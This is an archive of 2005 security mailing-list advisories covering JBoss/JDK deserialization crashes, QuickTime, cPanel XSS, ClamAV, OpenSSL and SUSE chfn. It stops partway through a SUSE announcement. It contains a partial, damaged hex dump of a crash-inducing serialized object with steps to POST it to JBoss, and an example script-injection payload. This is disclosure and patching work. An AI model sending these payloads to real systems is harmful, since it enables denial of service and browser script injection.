Remotely DoSing JBoss 4.0.2 with serialized java objects
=+= Remotely DoSing JBoss 4.0.2 with serialized java objects Implications of serialisation vulnerabilies in JDK =+= Author: Marc Schoenefeld , illegalaccess.org marc/at/illegalaccess.org =+= Date: November 4, 2005 =+= As I had the chance to demonstrate on HackInTheBox 2005 the JDK 1.4.2 was vulnerable to a font deserialization bug. This can be used to crash the default installation of every version of JBoss application on Win32, up to the current 4.0.2 version. JBoss offers the possibility of invoking JMX methods with the URL: http://host:8080/invoker/JMXInvokerServlet I fuzzed several values in the GRAY.pf font file, and created a serialized font object from it. The resulting file can be found in [Appendix:1]. Then I wrote a small program [Appendix:2] that POSTs the object via HTTP to the /invoker/JMXInvokerServlet. The following deserialisation call crashes the underlying JDK [Appendix:3]. To reconstruct run 1) a JBoss server in the default installation 2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser 3) Run InvokerUpload.java [Appendix:2] with two arguments, like java InvokerUpload 127.0.0.1 iccprofile.ser There are several other vulnerable object types that can be triggered that way from remote like several classes from rt.jar that expose this bug also in 1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and [Appendix:5]. Even worse these bugs crash the JVM on all platforms (WOCE, write once crash everyhere). Sun is aware of this particular bug since 7/17/05. In order to finally support the safe release of a fix and an official advisory from Sun I rewill not disclose the serialized vulnerable version of the affected java.lang.* classes until the release of a fix. After my bug report Sun announced fixes in 5.0U6, 1.4.2_11 and 1.3.1_17. It shall be noted that there is no vulnerability problem with JBoss itself, as this is a flaw in the JDK only. Problems in the java serialisation API are not new, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1 JBoss is used only for demonstration purposes to show a good product may suffer from vulnerabilities in the layer below. Therefore every architecture that uses the serialisation API is potentially affected. Sincerely Marc Schönefeld =+= [Appendix:1] iccprofile.ser.xxd 000: aced 0005 7372 001e 6a61 7661 2e61 7774 sr..java.awt 010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669 .color.ICC_Profi 020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200 leGray.d/... 030: 0078 7200 1a6a 6176 612e 6177 742e 636f .xr..java.awt.co 040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9 lor.ICC_Profile. 050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363 W.B...I..icc 060: 5072 6f66 696c 6553 6572 6961 6c69 7a65 ProfileSerialize 070: 6444 6174 6156 6572 7369 6f6e 7870 dDataVersionxp.. 080: 0001 7075 7200 025b 42ac f317 f806 0854 ..pur..[B..T 090: e002 7870 0278 4b43 xp...xKC 0a0: 4d53 0200 6d6e 7472 4752 4159 5859 MSmntrGRAYXY 0b0: 5a20 005f 0007 001b 0011 001e 000f 6163 Z ._..ac 0c0: 7370 5355 4e57 0001 4b4f 4441 4752 spSUNWKODAGR 0d0: 4159 0001 AY.. 0e0: f6d5 0001 d32b .+.. 0f0: 100: 110: 0006 6370 ..cp 120: 7274 00cc 003f 6465 7363 rt...?desc.. 130: 010c 0081 646d 6e64 0190 ..dmnd.. 140: 0060 7774 7074 01f0 0014 6b54 .`wtptkT 150: 5243 0204 000e 646d 6464 RCdmdd.. 160: 0214 0064 7465 7874 434f .dtextCO 170: 5059 5249 4748 5420 2863 2920 3139 3937 PYRIGHT (c) 1997 180: 2045 6173 746d 616e 204b 6f64 616b 2c20 Eastman Kodak, 190: 416c 6c20 7269 6768 7473 2072 6573 6572 All rights reser 1a0: 7665 642e 6465 7363 ved...desc.. 1b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c .'KODAK Grayscal 1c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047 e Conversion - G 1d0: 616d 6d61 2031 2e30 amma 1.0 1e0: 00d8 b240 [EMAIL PROTECTED] 1f0: 00ff ff11 0100 00c4 087e ...~ 200: 210: 00c4 087e 00c4 087e 000c ...~...~ 220: 0001 6465 7363 ..desc.. 230: 0006 4b4f 4441 4b00
Advisory: Apple QuickTime Player Remote Integer Overflow (2)
Apple QuickTime Player Remote Integer Overflow (2) by Piotr Bania [EMAIL PROTECTED] http://pb.specialised.info All rights reserved. CVE-ID: CVE-2005-2754 Original location: http://pb.specialised.info/all/adv/quicktime-mov-io2-adv.txt Severity: Critical - remote code execution. Software affected: QuickTime package 7.0.1 for Mac OS X 10.3 QuickTime package 7.0.1 for Mac OS X 10.4 QuickTime package 6.5.2 for Mac OS X 10.3 QuickTime package 6.5.2 for Mac OS X 10.2 QuickTime package 7* for Windows Older versions may be also vulnerable. Note: Following versions are not vulnerable, due to the fact I have reported the vulnerabilities before their releases: QuickTime package 7.0.2 for Mac OS X 10.3 QuickTime package 7.0.2 for Mac OS X 10.4 0. DISCLAIMER Author takes no responsibility for any actions with provided informations or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications is not permitted without the author's agreement. I. BACKGROUND Apple QuickTime Player is one of the Apple QuickTime components used by hundreds of millions of users. II. DESCRIPTION Apple QuickTime Player is reported prone to remote integer overflow vulnerability (exploitable via remotely originated content). Improper movie attributes could result in a very large memory copy, which lead to potencial memory overwrite. The vulnerability may lead to remote code execution when specially crafted video file (MOV file) is being loaded. III. POC CODE Due to severity of this bug i will not release any proof of concept codes for this issue. IV. VENDOR RESPONSE Vendor (Apple) has been noticed and released all necessary patches. best regards, Piotr Bania -- Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://pb.specialised.info - Key ID: 0xBE43AC33 Dinanzi a me non fuor cose create se non etterne, e io etterno duro. Lasciate ogne speranza, voi ch'intrate - Dante, Inferno Canto III
Advisory: Apple QuickTime PICT Remote Memory Overwrite
Apple QuickTime PICT Remote Memory Overwrite by Piotr Bania [EMAIL PROTECTED] http://pb.specialised.info All rights reserved. CVE-ID: CVE-2005-2756 Original location: http://pb.specialised.info/all/adv/quicktime-pict-adv.txt Severity: Critical - remote code execution. Software affected: QuickTime package 7.0.1 for Mac OS X 10.3 QuickTime package 7.0.1 for Mac OS X 10.4 QuickTime package 6.5.2 for Mac OS X 10.3 QuickTime package 6.5.2 for Mac OS X 10.2 QuickTime package 7* for Windows Older versions may be also vulnerable. Note: Following versions are not vulnerable, due to the fact I have reported the vulnerabilities before their releases: QuickTime package 7.0.2 for Mac OS X 10.3 QuickTime package 7.0.2 for Mac OS X 10.4 0. DISCLAIMER Author takes no responsibility for any actions with provided informations or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications is not permitted without the author's agreement. I. BACKGROUND Apple QuickTime PictureViewer is one of the Apple QuickTime components used by hundreds of millions of users. II. DESCRIPTION Apple QuickTime PictureViewer is reported prone to remote memory overwrite vulnerability (exploitable via remotely originated content). Expansion of compressed PICT data could exceed the size of the destination buffer, this cause an memory overwrite. The vulnerability may lead to remote code execution when specially crafted picture file (PICT file) is being loaded. III. POC CODE Due to severity of this bug i will not release any proof of concept codes for this issue. IV. VENDOR RESPONSE Vendor (Apple) has been noticed and released all necessary patches. best regards, Piotr Bania -- Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://pb.specialised.info - Key ID: 0xBE43AC33 Dinanzi a me non fuor cose create se non etterne, e io etterno duro. Lasciate ogne speranza, voi ch'intrate - Dante, Inferno Canto III
Advisory: Apple QuickTime Player Remote Denial Of Service
Apple QuickTime Player Remote Denial Of Service by Piotr Bania [EMAIL PROTECTED] http://pb.specialised.info All rights reserved. CVE-ID: CVE-2005-2755 Original location: http://pb.specialised.info/all/adv/quicktime-mov-dos-adv.txt Severity: Critical - attack against any application loading remotely-originated content. Software affected: QuickTime package 7.0.1 for Mac OS X 10.3 QuickTime package 7.0.1 for Mac OS X 10.4 QuickTime package 6.5.2 for Mac OS X 10.3 QuickTime package 6.5.2 for Mac OS X 10.2 QuickTime package 7* for Windows Older versions may be also vulnerable. Note: Following versions are not vulnerable, due to the fact I have reported the vulnerabilities before their releases: QuickTime package 7.0.2 for Mac OS X 10.3 QuickTime package 7.0.2 for Mac OS X 10.4 0. DISCLAIMER Author takes no responsibility for any actions with provided informations or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications is not permitted without the author's agreement. I. BACKGROUND Apple QuickTime Player is one of the Apple QuickTime components used by hundreds of millions of users. II. DESCRIPTION Apple QuickTime Player is reported prone to remote denial of service attack (exploitable via remotely originated content). A missing movie attribute is interpreted as an extension, but the absence of the extension is not flagged as an error, resulting in a de-reference of a NULL pointer. This will cause a denial of service against any application loading remotely-originated content. III. POC CODE Due to severity of this bug i will not release any proof of concept codes for this issue. IV. VENDOR RESPONSE Vendor (Apple) has been noticed and released all necessary patches. best regards, Piotr Bania -- Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://pb.specialised.info - Key ID: 0xBE43AC33 Dinanzi a me non fuor cose create se non etterne, e io etterno duro. Lasciate ogne speranza, voi ch'intrate - Dante, Inferno Canto III
[SECURITY] [DSA 881-1] New OpenSSL 0.9.6 packages fix cryptographic weakness
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 881-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 4th, 2005 http://www.debian.org/security/faq - -- Package: openssl096 Vulnerability : cryptographic weakness Problem type : remote Debian-specific: no CVE ID : CVE-2005-2969 Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer (OpenSSL) library that can allow an attacker to perform active protocol-version rollback attacks that could lead to the use of the weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS 1.0. The following matrix explains which version in which distribution has this problem corrected. oldstable (woody) stable (sarge) unstable (sid) openssl 0.9.6c-2.woody.8 0.9.7e-3sarge1 0.9.8-3 openssl 094 0.9.4-6.woody.4 n/a n/a openssl 095 0.9.5a-6.woody.6n/a n/a openssl 096 n/a 0.9.6m-1sarge1n/a openssl 097 n/an/a0.9.7g-5 We recommend that you upgrade your libssl packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge1.dsc Size/MD5 checksum: 617 ce5f1e232a472723ca68499327b72dbb http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m-1sarge1.diff.gz Size/MD5 checksum:18775 21461483c9dc895530bedc3b973faa07 http://security.debian.org/pool/updates/main/o/openssl096/openssl096_0.9.6m.orig.tar.gz Size/MD5 checksum: 2184918 1b63bfdca1c37837e9f1623498f9 Alpha architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_alpha.deb Size/MD5 checksum: 1964914 393db230e3682b76c3c9f36eb42264e6 AMD64 architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_amd64.deb Size/MD5 checksum: 577924 c07845bb45e5c3b75456f961e336eb13 ARM architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_arm.deb Size/MD5 checksum: 518534 eea289b8dde19ac6c8c6cf7b30ea4eb1 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_i386.deb Size/MD5 checksum: 1754964 7b514ad94e57dc9fd6e4842b2946640d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_ia64.deb Size/MD5 checksum: 814794 0c604b4b2f703c01173d140b95f61cd6 HP Precision architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_hppa.deb Size/MD5 checksum: 587272 01cbb27d7021792fd6570b2f466ce41a Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_m68k.deb Size/MD5 checksum: 476638 64e57e89c2efbe43db0ee00ae686413b Big endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_mips.deb Size/MD5 checksum: 576718 a05286b7d56e76bb6863987f9428cfa8 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_mipsel.deb Size/MD5 checksum: 568608 11f1592d26bc34ed8b2ecae3af730e04 PowerPC architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_powerpc.deb Size/MD5 checksum: 582352 48a678cc33b6b253be1dff5d8d7d23da IBM S/390 architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_s390.deb Size/MD5 checksum: 602274 4b926097074513294652c4bef75f1f4f Sun Sparc architecture: http://security.debian.org/pool/updates/main/o/openssl096/libssl0.9.6_0.9.6m-1sarge1_sparc.deb Size/MD5 checksum: 1458254 29c66b77c695f27f4f38dbdfbd51d320 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb
Secunia Research: cPanel Entropy Chat Script Insertion Vulnerability
== Secunia Research 04/11/2005 - cPanel Entropy Chat Script Insertion Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 About Secunia8 Verification.9 == 1) Affected Software cPanel 10.2.0-R82 and 10.6.0-R137 Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Cross-site scripting Where: Remote == 3) Vendor's Description of Software cPanel WebHost Manager (WHM) is a next generation web hosting control panel system. Both cPanel WHM are extremely feature rich as well as include an easy to use web based interface (GUI). Product link: http://www.cpanel.net/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in cPanel, which can be exploited by malicious people to conduct script insertion attacks. Input passed to the chat message field in the pre-installed Entropy Chat script isn't properly sanitised before being used. This can be exploited to inject arbitrary script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed with the Microsoft Internet Explorer browser. Example: Send message b style=width:expression([code])text/b via http://[host]:2084/ The vulnerability has been confirmed in versions 10.2.0-R82 and 10.6.0-R137. Other versions may also be affected. == 5) Solution Edit the source code to ensure that input is properly sanitised. == 6) Time Table 10/10/2005 - Vulnerability discovered. 14/10/2005 - Vendor notified. 04/11/2005 - Public disclosure. == 7) Credits Discovered by Andreas Sandblad, Secunia Research. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2005-56/advisory/ ==
[SECURITY] [DSA 882-1] New OpenSSL packages fix cryptographic weakness
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 882-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 4th, 2005 http://www.debian.org/security/faq - -- Package: openssl095 Vulnerability : cryptographic weakness Problem type : remote Debian-specific: no CVE ID : CVE-2005-2969 Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer (OpenSSL) library that can allow an attacker to perform active protocol-version rollback attacks that could lead to the use of the weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS 1.0. The following matrix explains which version in which distribution has this problem corrected. oldstable (woody) stable (sarge) unstable (sid) openssl 0.9.6c-2.woody.8 0.9.7e-3sarge1 0.9.8-3 openssl 094 0.9.4-6.woody.4 n/a n/a openssl 095 0.9.5a-6.woody.6n/a n/a openssl 096 n/a 0.9.6m-1sarge1n/a openssl 097 n/an/a0.9.7g-5 We recommend that you upgrade your libssl packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.6.dsc Size/MD5 checksum: 631 06d702bf602bdf36e76ccf1d293e2755 http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.6.diff.gz Size/MD5 checksum:39425 bbc79b4a3b51c3407642a909924636b3 http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz Size/MD5 checksum: 1892089 99d22f1d4d23ff8b927f94a9df3997b4 Alpha architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_alpha.deb Size/MD5 checksum: 497428 d7f43468426f4937d9f6f4f200b62ac4 ARM architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_arm.deb Size/MD5 checksum: 402790 3b6d0893487c55369771219423b8acf0 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_i386.deb Size/MD5 checksum: 400034 11c30a4af4fb8f00848aff98caf4a721 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_m68k.deb Size/MD5 checksum: 377034 5bc6aa7ce2c912bf6b306db88044e58d Big endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_mips.deb Size/MD5 checksum: 412864 ca4c4ace9a42844cfd93320f6438895a Little endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_mipsel.deb Size/MD5 checksum: 407678 ca10a64a6c760d2e45f2a1cdfa33ed1e PowerPC architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_powerpc.deb Size/MD5 checksum: 425740 106ba99bf991c3e8864d414be25a92e4 Sun Sparc architecture: http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.6_sparc.deb Size/MD5 checksum: 412474 1abb2a98b00c638cf88cead55ec5959f These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDa087W5ql+IAeqTIRAnAZAKCOLyaJHACQRNsDAQCT9v1uDUh/PQCdE21J P2lza1cE34ISntH0x71nruA= =vSg3 -END PGP SIGNATURE-
ZDI-05-002: Clam Antivirus Remote Code Execution
ZDI-05-002: Clam Antivirus Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-05-002.html November 4th, 2005 -- CVE ID: CAN-2005-3303 -- Affected Vendor: Clam AntiVirus -- Affected Products: Clam AntiVirus 0.80 through 0.87 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since October 24th, 2005 by Digital Vaccine protection filter ID 3874. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable ClamAV installations. Authentication is not required to exploit this vulnerability. This specific flaw exists within libclamav/fsg.c during the unpacking of executable files compressed with FSG v1.33. Due to invalid bounds checking when copying user-supplied data to heap allocated memory, an exploitable memory corruption condition is created. The unpacking algorithm for other versions of FSG is not affected. -- Vendor Response: The bug has been fixed in version 0.87.1. Release notes: http://www.sourceforge.net/project/shownotes.php?release_id=368319 -- Disclosure Timeline: 2005.10.24 - Vulnerability reported to vendor 2005.10.24 - Digital Vaccine released to TippingPoint customers 2005.10.25 - Vulnerability information provided to ZDI security partners 2005.11.04 - Public release of advisory -- Credit: This vulnerability was discovered by an anonymous ZDI researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
SUSE Security Announcement: pwdutils, shadow (SUSE-SA:2005:064)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:pwdutils, shadow Announcement ID:SUSE-SA:2005:064 Date: Fri, 04 Nov 2005 14:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux 9.0 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: local privilege escalation Severity (1-10):7 SUSE Default Package: yes Cross-References: - Content of This Advisory: 1) Security Vulnerability Resolved: pwdutils privilege escalation Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: - See SUSE Security Summary Report 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Thomas Gerisch found that the setuid 'chfn' program contained in the pwdutils suite insufficiently checks it's arguments when changing the GECOS field. This bug leads to a trivially exploitable local privilege escalation that allows users to gain root access. We like to thank Thomas Gerisch for pointing out the problem. 2) Solution or Work-Around Removing the setuid bit from /usr/bin/chfn renders chfn useless but also prevents successful exploitation. Note that this workaround only lasts until the next run of SuSEconfig which will restore the setuid bit if you are on permissions level 'easy' or 'secure'. 3) Special Instructions and Notes None 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/pwdutils-3.0.4-4.2.i586.rpm 385e9ef4f03e67ddb50a6a21d5b9f0e9 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pwdutils-2.6.96-4.2.i586.rpm 4705772232599de3a2d9dc83c922ee47 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pwdutils-2.6.90-6.2.i586.rpm aae77d1eab9d617be89ab993f9f8a47d SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pwdutils-2.6.4-2.18.3.i586.rpm 5e957e0370ac82874979e0c02187517e SuSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/shadow-4.0.3-267.i586.rpm 8cf127c4d2e74f17cf0ff058f4feaf00 Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/pwdutils-3.0.4-4.2.ppc.rpm 533274d92b8375bc51b6a3684c1cf506 x86-64 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/pwdutils-3.0.4-4.2.x86_64.rpm cc54040195f24925474d1896c45ccb30 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pwdutils-2.6.96-4.2.x86_64.rpm 785543d9276bd5de611ce0e82bc3c066 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/pwdutils-2.6.90-6.2.x86_64.rpm 82b384b4d65189c2af84677d7fc02dba SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pwdutils-2.6.4-2.18.3.x86_64.rpm f5d860c203d8dc5c6b85318229fe68d8 SuSE Linux 9.0: ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/shadow-4.0.3-267.x86_64.rpm 384136f520ebf09d3be779291da92c8d Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/pwdutils-3.0.4-4.2.src.rpm f4b6aedde6cf93e1fe5b47bda874e72a SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/pwdutils-2.6.96-4.2.src.rpm cb0d28c88ecf013418234ed39ff87e85 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/pwdutils-2.6.90-6.2.src.rpm